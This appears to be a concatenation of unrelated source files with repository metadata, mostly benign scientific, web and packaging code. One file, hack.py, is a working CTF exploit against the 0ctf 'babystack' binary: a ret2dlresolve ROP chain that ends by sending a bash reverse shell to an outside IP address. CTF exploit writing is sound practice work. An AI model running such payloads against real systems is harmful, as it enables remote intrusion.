    'events-const-all.cfg', \
    'events-const-all-equal.cfg', \
    'events-const-all-greater.cfg', \
    'events-chg-u300.cfg', \
    'events-chg-u300-equal.cfg', \
    'events-chg-u300-greater.cfg', \
    'events-chg-u30.cfg', \
    'events-chg-u30-equal.cfg', \
    'events-chg-u30-greater.cfg', \
])

# Load in the base slurm file
with open(base_script_filename, 'r') as fp:
    base_sub_script = fp.read()
def mkdir_p(path):
    '''
    This is functionally equivalent to the mkdir -p [fname] bash command
    '''
    # exist_ok=True reproduces the old try/except behaviour exactly: an
    # already-existing directory is fine, but any other failure (e.g. a
    # regular file sitting at *path*) still raises.
    # NOTE: the description above used to sit ABOVE the def, where it was a
    # no-op module-level string instead of this function's docstring.
    os.makedirs(path, exist_ok=True)
def main():
    """Parse command-line options and write one Slurm submission script per
    experimental condition.

    Each generated ``<prefix>.sb`` file is a job array of ``--replicates``
    tasks, produced by filling the ``<<...>>`` placeholders in the base
    submission script template.
    """
    parser = argparse.ArgumentParser(description="Run submission script.")
    parser.add_argument("--data_dir", type=str, help="Where is the base output directory for each run?")
    parser.add_argument("--config_dir", type=str, help="Where is the configuration directory for experiment?")
    parser.add_argument("--replicates", type=int, default=default_num_replicates, help="How many replicates should we run of each condition?")
    parser.add_argument("--run_experiment", action="store_true", help="Should we run the experiment?")
    parser.add_argument("--run_analysis", action="store_true", help="Should we run analyze mode?")
    parser.add_argument("--analysis_file", type=str, default="analysis.cfg", help="Path to the analysis script to use for avida analyze mode.")
    parser.add_argument("--job_dir", type=str, help="Where to output these job files?")

    # Load in command line arguments
    args = parser.parse_args()
    data_dir = args.data_dir
    config_dir = args.config_dir
    num_replicates = args.replicates
    run_exp = args.run_experiment
    run_analysis = args.run_analysis
    analysis_file_path = args.analysis_file
    job_dir = args.job_dir

    # Get list of all combinations to run
    combo_list = combos.get_combos()

    # Calculate how many jobs we have.  (The old final_job_id / num_digits /
    # job_id_str values were computed but never used, so they are gone.)
    num_jobs = num_replicates * len(combo_list)
    print(f'Generating {num_jobs} across {len(combo_list)} files!')

    # Create job file for each condition; each condition's seed block starts
    # at seed_offset and advances by num_replicates per condition.
    cur_job_id = 0
    for condition_dict in combo_list:
        cur_seed = seed_offset + (cur_job_id * num_replicates)
        filename_prefix = f'{cur_seed}_avida__{combos.get_str(condition_dict)}'
        file_str = base_sub_script
        file_str = file_str.replace("<<TIME_REQUEST>>", job_time_request)
        file_str = file_str.replace("<<ARRAY_ID_RANGE>>", f"1-{num_replicates}")
        file_str = file_str.replace("<<MEMORY_REQUEST>>", job_memory_request)
        file_str = file_str.replace("<<JOB_NAME>>", job_name)
        file_str = file_str.replace("<<CONFIG_DIR>>", config_dir)
        file_str = file_str.replace("<<EXEC>>", executable)
        file_str = file_str.replace("<<RUN_DIR>>", \
            os.path.join(data_dir, f'{filename_prefix}', '${SEED}'))
        file_str = file_str.replace("<<JOB_SEED_OFFSET>>", str(cur_seed))

        # Format configuration parameters for the run
        run_params = f'-set EVENT_FILE {condition_dict["EVENT_FILE"]}'
        run_params += ' -set COPY_MUT_PROB 0.0025'
        run_params += ' -set DISABLE_REACTION_SENSORS 1'
        run_params += ' -set REACTION_SENSORS_NEUTRAL 0.0'
        run_params += ' -set RANDOM_SEED ${SEED}'

        # Add run commands if we're running the experiment.
        run_commands = ''
        if run_exp:
            run_commands += f'RUN_PARAMS="{run_params}"\n'
            run_commands += 'echo "./${EXEC} ${RUN_PARAMS}" > cmd.log\n'
            run_commands += './${EXEC} ${RUN_PARAMS} > run.log\n'
        file_str = file_str.replace("<<RUN_COMMANDS>>", run_commands)

        # Add analysis commands if we're analyzing the data
        analysis_commands = ""
        if run_analysis:
            analysis_commands += f'RUN_PARAMS="{run_params}"\n'
            analysis_commands += './${EXEC} ${RUN_PARAMS}'
            analysis_commands += ' -set ANALYZE_FILE ' + analysis_file_path
            analysis_commands += ' -a\n'
        file_str = file_str.replace("<<ANALYSIS_COMMANDS>>", analysis_commands)

        with open(os.path.join(job_dir, f'{filename_prefix}.sb'), 'w') as fp:
            fp.write(file_str)
        cur_job_id += 1


if __name__ == "__main__":
    main()
| 43.067797 | 143 | 0.65978 |
acf6a078954001340f169678e1fdafcd5115f054 | 3,719 | py | Python | setup.py | federico123579/Foreanalyzer | 8d66550a894304c0f62f985c1410f56ed1561b3a | [
"MIT"
] | 2 | 2020-12-24T00:10:04.000Z | 2021-12-19T03:34:41.000Z | setup.py | federico123579/Foreanalyzer | 8d66550a894304c0f62f985c1410f56ed1561b3a | [
"MIT"
] | null | null | null | setup.py | federico123579/Foreanalyzer | 8d66550a894304c0f62f985c1410f56ed1561b3a | [
"MIT"
] | 1 | 2020-11-17T07:41:06.000Z | 2020-11-17T07:41:06.000Z | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# Note: To use the 'upload' functionality of this file, you must:
# $ pip install twine
import io
import os
import sys
from shutil import rmtree
from setuptools import find_packages, setup, Command
# Package meta-data.
NAME = 'foreanalyzer'
DESCRIPTION = 'Algorithms analyzer for the Forecaster bot.'
URL = 'https://github.com/federico123579/Foreanalyzer'
EMAIL = 'federico123579@gmail.com'
AUTHOR = 'Federico Lolli'
REQUIRES_PYTHON = '>=3.6.0'
VERSION = None
# What packages are required for this module to be executed?
REQUIRED = [
"forex_python",
"trading212api",
"pandas"
]
# What packages are optional?
EXTRAS = {
# 'fancy feature': ['django'],
}
# The rest you shouldn't have to touch too much :)
# ------------------------------------------------
# Except, perhaps the License and Trove Classifiers!
# If you do change the License, remember to change the Trove Classifier
# for that!
here = os.path.abspath(os.path.dirname(__file__))
# Import the README and use it as the long-description.
# Note: this will only work if 'README.md' is present in your MANIFEST.in file!
try:
with io.open(os.path.join(here, 'README.md'), encoding='utf-8') as f:
long_description = '\n' + f.read()
except FileNotFoundError:
long_description = DESCRIPTION
# Load the package's __version__.py module as a dictionary.
about = {}
if not VERSION:
with open(os.path.join(here, NAME, '__version__.py')) as f:
exec(f.read(), about)
else:
about['__version__'] = VERSION
class UploadCommand(Command):
    """Support setup.py upload."""

    # Shown by `python setup.py --help-commands`.
    description = 'Build and publish the package.'
    user_options = []

    @staticmethod
    def status(s):
        """Prints things in bold."""
        print('\033[1m{0}\033[0m'.format(s))

    def initialize_options(self):
        # Required by the Command interface; nothing to initialize.
        pass

    def finalize_options(self):
        # Required by the Command interface; nothing to finalize.
        pass

    def run(self):
        # Best-effort removal of previous build artifacts.
        try:
            self.status('Removing previous builds…')
            rmtree(os.path.join(here, 'dist'))
        except OSError:
            pass

        self.status('Building Source and Wheel (universal) distribution…')
        os.system(
            '{0} setup.py sdist bdist_wheel --universal'.format(sys.executable))

        self.status('Uploading the package to PyPI via Twine…')
        os.system('twine upload dist/*')

        # Tag the release with the version loaded from __version__.py.
        self.status('Pushing git tags…')
        os.system('git tag v{0}'.format(about['__version__']))
        os.system('git push --tags')

        # Stop setup.py once the upload is done.
        sys.exit()
# Where the magic happens:
setup(
    name=NAME,
    version=about['__version__'],
    description=DESCRIPTION,
    long_description=long_description,
    long_description_content_type='text/markdown',
    author=AUTHOR,
    author_email=EMAIL,
    python_requires=REQUIRES_PYTHON,
    url=URL,
    packages=find_packages(exclude=('tests',)),
    # If your package is a single module, use this instead of 'packages':
    # py_modules=['mypackage'],
    # entry_points={
    #     'console_scripts': ['mycli=mymodule:cli'],
    # },
    install_requires=REQUIRED,
    extras_require=EXTRAS,
    include_package_data=True,
    license='MIT',
    classifiers=[
        # Trove classifiers
        # Full list: https://pypi.python.org/pypi?%3Aaction=list_classifiers
        'License :: OSI Approved :: MIT License',
        'Programming Language :: Python',
        'Programming Language :: Python :: 3',
        'Programming Language :: Python :: 3.6',
        'Programming Language :: Python :: Implementation :: CPython',
        'Programming Language :: Python :: Implementation :: PyPy'
    ],
    # $ setup.py publish support.
    # Registers `python setup.py upload` (see UploadCommand above).
    cmdclass={
        'upload': UploadCommand,
    },
)
| 27.548148 | 80 | 0.643184 |
acf6a2a781173d719f1eed8495fc7af4c33384e6 | 2,892 | py | Python | app.py | jqueguiner/open_nsfw | 27809806ba3cf9ee9034c12bbe2667f691ec90c4 | [
"BSD-2-Clause"
] | null | null | null | app.py | jqueguiner/open_nsfw | 27809806ba3cf9ee9034c12bbe2667f691ec90c4 | [
"BSD-2-Clause"
] | null | null | null | app.py | jqueguiner/open_nsfw | 27809806ba3cf9ee9034c12bbe2667f691ec90c4 | [
"BSD-2-Clause"
] | null | null | null | import os
import sys
import subprocess
import requests
import ssl
import random
import string
import json
from flask import jsonify
from flask import Flask
from flask import request
import traceback
import numpy as np
import uvloop
from classify_nsfw import caffe_preprocess_and_compute, load_model
from app_utils import download
from app_utils import generate_random_filename
from app_utils import clean_me
from app_utils import clean_all
from app_utils import create_directory
from app_utils import get_model_bin
from app_utils import get_multi_model_bin
# Progressive fallback for the HTTP status-code module across Python versions.
try: # Python 3.5+
    from http import HTTPStatus
except ImportError:
    try: # Python 3
        from http import client as HTTPStatus
    except ImportError: # Python 2
        import httplib as HTTPStatus

# WSGI application instance used by the route handlers below.
app = Flask(__name__)
def allowed_file(filename):
    """Return True when *filename* carries an extension listed in the
    module-level ALLOWED_EXTENSIONS set (case-insensitive)."""
    _, dot, extension = filename.rpartition('.')
    return bool(dot) and extension.lower() in ALLOWED_EXTENSIONS
def classify(image_path: str) -> np.float64:
    """Score the image file at *image_path* with the loaded NSFW model.

    Relies on the module-level ``caffe_transformer`` and ``nsfw_net``
    initialised in ``__main__``.  Returns the second entry of the "prob"
    output layer — presumably the NSFW-class probability; the complement
    is treated as the SFW score by the caller.
    """
    with open(image_path, "rb") as image:
        scores = caffe_preprocess_and_compute(image.read(), caffe_transformer=caffe_transformer, caffe_net=nsfw_net, output_layers=["prob"])
    return scores[1]
@app.route("/detect", methods=["POST"])
def detect():
    """Classify an image for NSFW content.

    Accepts either a multipart upload under the ``file`` field or a JSON
    body of the form ``{"url": ...}``.  Responds with a JSON list holding
    both class scores, or 400 on any failure.
    """
    input_path = generate_random_filename(upload_directory, "jpg")
    try:
        if 'file' in request.files:
            file = request.files['file']
            # NOTE(review): if the extension is not allowed, nothing is
            # saved here and classify() below fails on the missing file,
            # which surfaces as the generic 400 response.
            if allowed_file(file.filename):
                file.save(input_path)
        else:
            url = request.json["url"]
            download(url, input_path)

        results = []
        nudity = classify(input_path)
        results.append({"nudity": str(True), "score": "{0:.4f}".format(nudity)})
        results.append({"nudity": str(False), "score": "{0:.4f}".format(1 - nudity)})
        return json.dumps(results), 200
    except Exception:
        # Was a bare `except:`, which also swallowed SystemExit and
        # KeyboardInterrupt; Exception keeps the same error handling for
        # real failures without masking interpreter shutdown.
        traceback.print_exc()
        return {'message': 'input error'}, 400
    finally:
        # Always delete the temporary upload, whatever happened above.
        clean_all([
            input_path
        ])
if __name__ == '__main__':
    # NOTE(review): `global` at module level is a no-op; these names are
    # already module globals read by the handlers above.
    global upload_directory, model_directory
    global nsfw_net, caffe_transformer
    global ALLOWED_EXTENSIONS

    ALLOWED_EXTENSIONS = set(['png', 'jpg', 'jpeg'])

    upload_directory = '/src/upload/'
    create_directory(upload_directory)

    model_directory = '/src/nsfw_model/'
    create_directory(model_directory)

    # Download the Caffe prototxt + weights via the app_utils helper.
    model_url_prefix = "http://pretrained-models.auth-18b62333a540498882ff446ab602528b.storage.gra.cloud.ovh.net/image/nsfw/"
    get_multi_model_bin([(
        model_url_prefix + 'deploy.prototxt',
        model_directory + 'deploy.prototxt'
    ),(
        model_url_prefix + 'resnet_50_1by2_nsfw.caffemodel',
        model_directory + 'resnet_50_1by2_nsfw.caffemodel'
    )])

    nsfw_net, caffe_transformer = load_model()

    port = 5000
    host = '0.0.0.0'
    app.run(host=host, port=port, threaded=True)
acf6a466203c48ff663725c17faa528a688ba5ad | 1,382 | py | Python | util/get_weak_anns.py | chunbolang/BAM | edfa54beca5552aba2b5f3d19de4ef21f8d13275 | [
"MIT"
] | 41 | 2022-03-12T03:09:32.000Z | 2022-03-31T16:13:19.000Z | util/get_weak_anns.py | chunbolang/BAM | edfa54beca5552aba2b5f3d19de4ef21f8d13275 | [
"MIT"
] | 11 | 2022-03-16T14:26:14.000Z | 2022-03-31T12:40:05.000Z | util/get_weak_anns.py | chunbolang/BAM | edfa54beca5552aba2b5f3d19de4ef21f8d13275 | [
"MIT"
] | 6 | 2022-03-18T12:50:34.000Z | 2022-03-30T06:03:07.000Z | from __future__ import absolute_import, division
import networkx as nx
import numpy as np
from scipy.ndimage import binary_dilation, binary_erosion, maximum_filter
from scipy.special import comb
from skimage.filters import rank
from skimage.morphology import dilation, disk, erosion, medial_axis
from sklearn.neighbors import radius_neighbors_graph
import cv2
import matplotlib.pyplot as plt
import matplotlib.patches as mpatches
from scipy import ndimage
def find_bbox(mask):
    """Return connected-component stats rows ``[x, y, w, h, area]`` for *mask*.

    Thin wrapper over ``cv2.connectedComponentsWithStats``; row 0 (label 0,
    the background component) is dropped.
    """
    _, labels, stats, centroids = cv2.connectedComponentsWithStats(mask.astype(np.uint8))
    return stats[1:] # remove bg stat
def transform_anns(mask, ann_type):
    """Convert a segmentation *mask* into the requested weak annotation.

    Returns ``(annotation, original_mask)`` where ``original_mask`` is an
    untouched copy of the input.  For ``'bbox'`` the filled bounding box of
    every connected component is drawn into *mask* in place; for ``'mask'``
    the input is returned unchanged.  Any other *ann_type* implicitly
    yields ``None``, matching the historical behaviour.
    """
    untouched = mask.copy()
    if ann_type == 'mask':
        return mask, untouched
    if ann_type == 'bbox':
        for x, y, w, h, _area in find_bbox(mask):
            # thickness -1 fills the rectangle instead of outlining it
            cv2.rectangle(mask, (x, y), (x + w, y + h), 1, -1)
        return mask, untouched
if __name__ == '__main__':
    # Demo: draw the filled (green) bounding box of every component found
    # in a sample label image and save the overlay to bbox.png.
    label_path = '2008_001227.png'
    mask = cv2.imread(label_path, cv2.IMREAD_GRAYSCALE)
    bboxs = find_bbox(mask)
    mask_color = cv2.imread(label_path, cv2.IMREAD_COLOR)
    for j in bboxs:
        cv2.rectangle(mask_color, (j[0], j[1]), (j[0] + j[2], j[1] + j[3]), (0,255,0), -1)
    cv2.imwrite('bbox.png', mask_color)
    print('done')
| 32.904762 | 113 | 0.663531 |
acf6a488c98e192673a2f81785a091e6cf59c302 | 3,644 | py | Python | src/web/models/user.py | rodekruis/shelter-database | 99f96bf06a7287e925b7385dbf7cc363caf4a2bd | [
"MIT"
] | 9 | 2016-07-12T06:41:48.000Z | 2022-02-03T05:55:17.000Z | src/web/models/user.py | rodekruis/shelter-database | 99f96bf06a7287e925b7385dbf7cc363caf4a2bd | [
"MIT"
] | 22 | 2016-09-06T05:36:37.000Z | 2021-09-07T23:41:26.000Z | src/web/models/user.py | rodekruis/shelter-database | 99f96bf06a7287e925b7385dbf7cc363caf4a2bd | [
"MIT"
] | 3 | 2016-08-19T05:37:08.000Z | 2017-02-20T06:58:03.000Z | #! /usr/bin/env python
#-*- coding: utf-8 -*-
# ***** BEGIN LICENSE BLOCK *****
# This file is part of Shelter Database.
# Copyright (c) 2016 Luxembourg Institute of Science and Technology.
# All rights reserved.
#
#
#
# ***** END LICENSE BLOCK *****
__author__ = "Cedric Bonhomme"
__version__ = "$Revision: 0.1 $"
__date__ = "$Date: 2016/03/30$"
__revision__ = "$Date: 2016/03/30 $"
__copyright__ = "Copyright (c) "
__license__ = ""
import re
import conf
import requests
from datetime import datetime
from werkzeug import generate_password_hash, check_password_hash
from flask_login import UserMixin
from sqlalchemy import desc
from sqlalchemy.dialects.postgresql import JSON
from bootstrap import db
class User(db.Model, UserMixin):
    """
    Represent a user.
    """
    id = db.Column(db.Integer, primary_key=True)
    email = db.Column(db.String(), unique=True, nullable=False)
    name = db.Column(db.String(), default='')
    # Salted password hash produced by werkzeug (see set_password).
    pwdhash = db.Column(db.String(), nullable=False)
    # Humanitarian ID identifier, used to derive a fallback picture URL.
    h_id = db.Column(db.String(), nullable=True)
    # Profile picture: either a plain URL string (new API) or a legacy
    # list-of-dicts payload (old API) — see get_image_url.
    image = db.Column(JSON, nullable=True)
    organization = db.Column(db.String(), nullable=True)
    created_at = db.Column(db.DateTime(), default=datetime.now)
    last_seen = db.Column(db.DateTime(), default=datetime.now)
    is_admin = db.Column(db.Boolean(), default=False)
    is_active = db.Column(db.Boolean(), default=False)
    preferred_language = db.Column(db.String(), default='en')

    # relationships
    shelters = db.relationship('Shelter', backref='responsible', lazy='dynamic',
                               cascade='all, delete-orphan',
                               order_by=desc('Shelter.id'))

    @staticmethod
    def make_valid_name(name):
        """Strip every character that is not alphanumeric, '_' or '.'."""
        # Raw string: the old non-raw literal contained the invalid escape
        # sequence '\.', which modern CPython flags as a warning.
        return re.sub(r'[^a-zA-Z0-9_\.]', '', name)

    def get_id(self):
        """
        Return the id of the user.
        """
        return self.id

    def set_password(self, password):
        """
        Hash the password of the user.
        """
        self.pwdhash = generate_password_hash(password)

    def check_password(self, password):
        """
        Check the password of the user.
        """
        return check_password_hash(self.pwdhash, password)

    def get_image_url(self):
        """
        Get Image from json data saved in user column `image`
        where the image format is of :
        [{
            "type": "URL",
            "url": "https://media.licdn.com/mpr/mpr/shrin.jpg",
            "_id": "58ac0b0a3a474c7b005b0542"
        },....]
        This is stored using libs/utils.py Class: HumanitarianId
        """
        # For old api data
        if self.image and isinstance(self.image, list):
            for image in self.image:
                # Return url of type url among images
                if image.get('type', None) == 'URL':
                    return image.get('url')
        # For new api data (just single url)
        if self.image and len(self.image):
            return self.image
        # Fall back to the conventional Humanitarian ID picture location
        # and cache it in `image` when the probe succeeds.
        if self.h_id:
            image = conf.HUMANITARIAN_ID_AUTH_URI+"/assets/pictures/"\
                + self.h_id + ".jpg"
            r = requests.get(image)
            if r.status_code == 200:
                self.image = image
                db.session.add(self)
                db.session.commit()
                return image
        return None

    def __str__(self):
        """
        Required for administrative interface.
        """
        return self.name

    def __repr__(self):
        return '<User %r>' % (self.name)
| 30.621849 | 80 | 0.590834 |
acf6a5325b24cc793124eff67d98b3af1219e111 | 1,287 | py | Python | 2018/0ctf/baby-stack/hack.py | ss8651twtw/CTF | cf348597cb72558cc5cd8d50582860fadf014228 | [
"MIT"
] | 12 | 2018-01-06T13:36:57.000Z | 2021-07-19T16:47:57.000Z | 2018/0ctf/baby-stack/hack.py | ss8651twtw/Secure-Programming | cf348597cb72558cc5cd8d50582860fadf014228 | [
"MIT"
] | null | null | null | 2018/0ctf/baby-stack/hack.py | ss8651twtw/Secure-Programming | cf348597cb72558cc5cd8d50582860fadf014228 | [
"MIT"
] | 2 | 2019-07-06T03:46:38.000Z | 2019-10-28T15:15:36.000Z | #!/usr/bin/env python
from pwn import *
from hashlib import sha256
import time
# r = process('./babystack')
r = remote('202.120.7.202', 6666)


def verify():
    """Pass the service's proof-of-work gate.

    Reads one prefix line from the remote, brute-forces a 4-byte
    little-endian suffix whose sha256(prefix + suffix) digest begins with
    three zero bytes, and sends that suffix back.  (Python 2 script:
    note `xrange` and byte-strings.)
    """
    data = r.recvline()[:-1]
    for i in xrange(2 ** 32):
        if sha256(data + p32(i)).digest().startswith('\0\0\0'):
            break
    r.send(p32(i))
    log.info('POW is over')
    sleep(0.5)
def send(data, length):
    """Pad *data* with spaces to *length* bytes and send it to the remote.

    The short sleep spaces out writes — presumably so the target's reads
    don't coalesce consecutive payloads; confirm against the binary.
    """
    time.sleep(0.1)
    r.send(data.ljust(length))
# Hard-coded addresses from the 32-bit target binary: first PLT stub,
# .rel.plt / .dynsym / .dynstr section starts, main(), read@plt, and a
# writable scratch buffer where the forged ELF records are staged.
plt0 = 0x80482f0
relplt = 0x80482b0
dynsym = 0x80481cc
dynstr = 0x804822c
main = 0x8048457
read_plt = 0x8048300
buf = 0x804a500

# ROP chain: enter PLT0 with a reloc_arg that points past the real
# .rel.plt to the forged Elf32_Rel placed at `buf`.
rop = flat(
    # _dl_runtime_resolve call and reloc_arg
    plt0, buf - relplt, # will resolve system
    0xdeadbeef, # return address
    buf + 36 # parameter "/bin/sh"
)

# Forged relocation + symbol records staged at `buf`.  The `/ 16` is
# Python 2 integer division (symbol index into the fake Elf32_Sym).
data = flat(
    # Elf32_Rel
    buf, 0x7 | ((buf + 12 - dynsym) / 16) << 8, 0xdeadbeef, # 0xdeadbeef is padding
    # Elf32_Sym
    buf + 28 - dynstr, 0, 0, 0x12,
    'system\x00\x00',
    '/bin/sh\x00'
)

verify()
# read data to buf
send('a' * 44 + flat(read_plt, main, 0, buf, 44), 0x40)
send(data, 44)
# use ret2dlresolve to call system("/bin/sh")
send('a' * 44 + rop, 0x40)
# make a reverse shell
send('bash -c "bash -i &>/dev/tcp/35.201.141.84/80 0>&1"', 0x100)
r.interactive() | 21.098361 | 87 | 0.590521 |
acf6a68de512eb216ac25ce589db67bd09ee7997 | 3,010 | py | Python | tutorons/core/templates/module/detect.py | andrewhead/tutorons-base | d997ebec27d2723bf5cd34981eb7900c19ce8914 | [
"BSD-3-Clause"
] | 2 | 2019-10-21T05:42:09.000Z | 2020-12-01T20:56:00.000Z | tutorons/core/templates/module/detect.py | andrewhead/tutorons-base | d997ebec27d2723bf5cd34981eb7900c19ce8914 | [
"BSD-3-Clause"
] | null | null | null | tutorons/core/templates/module/detect.py | andrewhead/tutorons-base | d997ebec27d2723bf5cd34981eb7900c19ce8914 | [
"BSD-3-Clause"
] | null | null | null | #! /usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
import logging
from tutorons.core.extractor import Region
logging.basicConfig(level=logging.INFO, format="%(message)s")
class {{ title_case_app_name }}Extractor(object):
''' Finds regions of explainable code in HTML elements. '''
def extract(self, node):
'''
Detect explainable regions of code in an HTML element.
Args:
node: an HTML element (it's a node created by BeautifulSoup
parsing HTML)
Returns:
A list of `Region`s, each containing a piece of detected code and
a link to its unique location in the page.
'''
# Get the text contained in the HTML element
text = node.text
# Detect code in the element. However you detect it, you need to make
# sure to save the character offset of the piece of code within the
# text of this HTML element. Most code parsers will give you a line
# and offset of each symbol. If you use such a parser, you can find
# the character offset of the code by sum up the number of characters
# in each line before the one where code was detected, and
# then add the within-line offset. In this example, we just use the
# standard Python string API to look for everywhere the symbol `foo`
# appears in the element.
pattern = "foo"
last_match_end = 0
# We'll store all of the detected code in this list.
regions = []
while True:
# Although the pattern detection shown here is specific to this
# example, this code computes offsets and makes regions in a way
# you'll have to do in your own code.
# You need to detect the index of the character where the code
# was detected.
match_start = text.find(pattern, last_match_end)
if match_start == -1:
break
# You also need to detect the index where the code stops. Make
# sure this points to the last character in the code and not
# to the first character after the code.
match_end = match_start + len(pattern) - 1
# Every region needs to include a reference to the node it was
# extracted from, the index of the first character where the code
# was detected within that element, the index of the last character
# of the detected code, and the code itself.
matching_region = Region(
node=node,
start_offset=match_start,
end_offset=match_end,
string=pattern,
)
regions.append(matching_region)
# Save the end index of this match so it can be used to advance
# the text search in the next loop iteration.
last_match_end = match_end
return regions
| 37.160494 | 79 | 0.611296 |
acf6a6de63ff3921ee5fba6c848d43e2ea92f353 | 3,691 | py | Python | src/test/vtkLocationCompare.py | jeremyjiezhou/Learn-PyTorch | 7e4404609bacd2ec796f6ca3ea118e8e34ab4a22 | [
"MIT"
] | 24 | 2016-10-04T20:49:55.000Z | 2022-03-12T19:07:10.000Z | src/test/vtkLocationCompare.py | jeremyjiezhou/Learn-PyTorch | 7e4404609bacd2ec796f6ca3ea118e8e34ab4a22 | [
"MIT"
] | null | null | null | src/test/vtkLocationCompare.py | jeremyjiezhou/Learn-PyTorch | 7e4404609bacd2ec796f6ca3ea118e8e34ab4a22 | [
"MIT"
] | 9 | 2016-12-11T22:15:03.000Z | 2020-11-21T13:51:05.000Z | #! /usr/bin/env python2.7
# -*- coding: utf-8 -*-
"""
Created on Thu Sep 18 16:56:58 2014
@author: Mayank Sabharwal, 2015
"""
# Path to the ParaView source build; '@PARAVIEW_DIR@' is substituted at
# configure time (see openfcst/src/CMakeLists.txt per the message below).
PARAVIEW_PATH='@PARAVIEW_DIR@/Build'
paraview_path=PARAVIEW_PATH

import os,sys
import scipy as sp
import numpy as np

# Make every directory of the ParaView build importable and visible to the
# dynamic linker, then attempt to import its Python API once.
if os.path.exists(paraview_path):
    for x in os.walk(paraview_path):
        sys.path.append(x[0])
        os.environ["LD_LIBRARY_PATH"]=os.environ.get("LD_LIBRARY_PATH")+":"+x[0]
    try:
        import paraview.simple as s
        flag=1
    except:
        flag=0
        print "Failed to import Paraview Python Libraries"
        print "Exiting code"
        exit(3)
else:
    print "Paraview source build not found!"
    print "Set the Paraview Path in openfcst/src/CMakeLists.txt!"
    flag=0
    exit(3)
print "="*50
print "="*50
print "= Checking the accuracy of the test results against the expected results"
print "-"*50
print "-"*50
print "= - Parse Commandline "

# Import command line option parser:
from optparse import OptionParser

# Setup of the command line options:
usage = "usage: %prog [options] fuel_cell_solution_DataFile_00001_Cycle_4.vtk reference_data.dat"
parser = OptionParser(usage)
options, filename = parser.parse_args(sys.argv[1:])

print "-"*50
print "-"*50
print "= - Load data"
print "Checking test results from file:", filename[1]
print "by comparing with data in the simulation result file:", filename[0]

# Reference file layout: header row, then rows of x, y, z followed by one
# column per named response.
tmp=sp.loadtxt(filename[1],dtype='string')
header = tmp[0]
refData = np.array(tmp[1:],dtype='float')
x=np.array(refData[:,0])
y=np.array(refData[:,1])
z=np.array(refData[:,2])
refResponses={}
for i in range(np.size(header)-3):
    refResponses[header[i+3]] = refData[:,i+3]
simResponses={}
for name in refResponses.iterkeys():
    simResponses[name]=[]

# Open the simulation result with the reader matching its extension.
fname=os.getcwd()+'/'+filename[0]
extension = os.path.splitext(filename[0])[1]
if extension == '.vtk':
    solution = s.LegacyVTKReader( guiName="solution", FileNames=[fname] )
elif extension == '.vtu':
    solution = s.XMLUnstructuredGridReader( guiName="solution", FileName=[fname] )
else:
    print "= - Unknown file format of type: ", extension

# Probe the solution at every reference point and collect the responses.
# The velocity_* names map onto components 0/1/2 of the "velocity" array.
for i in range(np.size(x)):
    temp=[]
    ProbeLocation1=[]
    ProbeLocation1 = s.ProbeLocation( guiName="ProbeLocation1", ProbeType="Fixed Radius Point Source", Input = solution )
    ProbeLocation1.ProbeType.Center = [x[i],y[i],z[i]]
    temp=s.servermanager.Fetch(ProbeLocation1)
    for name in refResponses.iterkeys():
        if name == 'velocity_X':
            simResponses[name].append(temp.GetPointData().GetArray('velocity').GetValue(0))
        elif name == 'velocity_Y':
            simResponses[name].append(temp.GetPointData().GetArray('velocity').GetValue(1))
        elif name == 'velocity_Z':
            simResponses[name].append(temp.GetPointData().GetArray('velocity').GetValue(2))
        else:
            simResponses[name].append(temp.GetPointData().GetArray(name).GetValue(0))

# Relative error per response; exit code encodes the worst case.
error={}
for name in simResponses.iterkeys():
    error[name]=np.absolute(refResponses[name]-simResponses[name])/refResponses[name]
max_error=np.max(error.values())
if max_error == 0:
    print "Test results match expected results"
    print "="*50
    print "="*50
    exit(0)
elif max_error < 0.01:
    print "Test results are within numerical error (1%), with the greatest being: ", max_error*100
    print "="*50
    print "="*50
    exit(0)
elif max_error < 0.1:
    print "Test results have an unacceptable error (between 1% and 10%), with the largest being: ", max_error*100
    print "="*50
    print "="*50
    exit(1)
else:
    print "Test results differ significantly from the expected results (greater than 10%): ", max_error*100
    print "="*50
    print "="*50
exit(1) | 30.254098 | 121 | 0.678407 |
acf6a87982d66f123cf59058b2e5a5f237ae7d5c | 2,399 | py | Python | assignment2/AssignmentMaterial_2/Framework/VideoCaptureDevices/ClassProperty.py | ecly/assignment1_bsii | eeb2bd6bfa3071df53457ce2a2ab723c6fedffe3 | [
"MIT"
] | null | null | null | assignment2/AssignmentMaterial_2/Framework/VideoCaptureDevices/ClassProperty.py | ecly/assignment1_bsii | eeb2bd6bfa3071df53457ce2a2ab723c6fedffe3 | [
"MIT"
] | null | null | null | assignment2/AssignmentMaterial_2/Framework/VideoCaptureDevices/ClassProperty.py | ecly/assignment1_bsii | eeb2bd6bfa3071df53457ce2a2ab723c6fedffe3 | [
"MIT"
] | null | null | null | #<!--------------------------------------------------------------------------->
#<!-- ITU - IT University of Copenhagen -->
#<!-- SSS - Software and Systems Section -->
#<!-- SIGB - Introduction to Graphics and Image Analysis -->
#<!-- File : ClassProperty.py -->
#<!-- Description: Class for managing the direct access to non-instanced -->
#<!-- objects in SIGB framework -->
#<!-- Author : Fabricio Batista Narcizo -->
#<!-- : Rued Langgaards Vej 7 - 4D06 - DK-2300 - Copenhagen S -->
#<!-- : fabn[at]itu[dot]dk -->
#<!-- Responsable: Dan Witzner Hansen (witzner[at]itu[dot]dk) -->
#<!-- Fabricio Batista Narcizo (fabn[at]itu[dot]dk) -->
#<!-- Information: This class is based on an example available in Stack -->
#<!-- Overflow Website (http://goo.gl/5YUJAQ) -->
#<!-- Date : 03/06/2014 -->
#<!-- Change : 03/06/2014 - Creation of this class -->
#<!-- Review : 24/10/2015 - Finalized -->
#<!--------------------------------------------------------------------------->
__version__ = "$Revision: 2015102401 $"
########################################################################
class ClassProperty(object):
    """Descriptor exposing a getter directly on the class (non-instanced
    access): reading the attribute invokes the getter with the owner class."""

    def __init__(self, getter, instance="0"):
        """Store the *getter* callable; *instance* is kept for interface
        compatibility with existing call sites."""
        self.getter = getter
        self.instance = instance

    def __get__(self, instance, owner):
        """Invoke the stored getter with the owning class and return its
        result, for both class-level and instance-level access."""
        return self.getter(owner)
| 59.975 | 79 | 0.34306 |
acf6a8e9ca9b181b601c08e91da7568bc00f9363 | 1,299 | py | Python | src/unicef_security/pipeline.py | unicef/unicef-security | cc51ba52cddb845b8174cf3dc94706f0334453b2 | [
"Apache-2.0"
] | null | null | null | src/unicef_security/pipeline.py | unicef/unicef-security | cc51ba52cddb845b8174cf3dc94706f0334453b2 | [
"Apache-2.0"
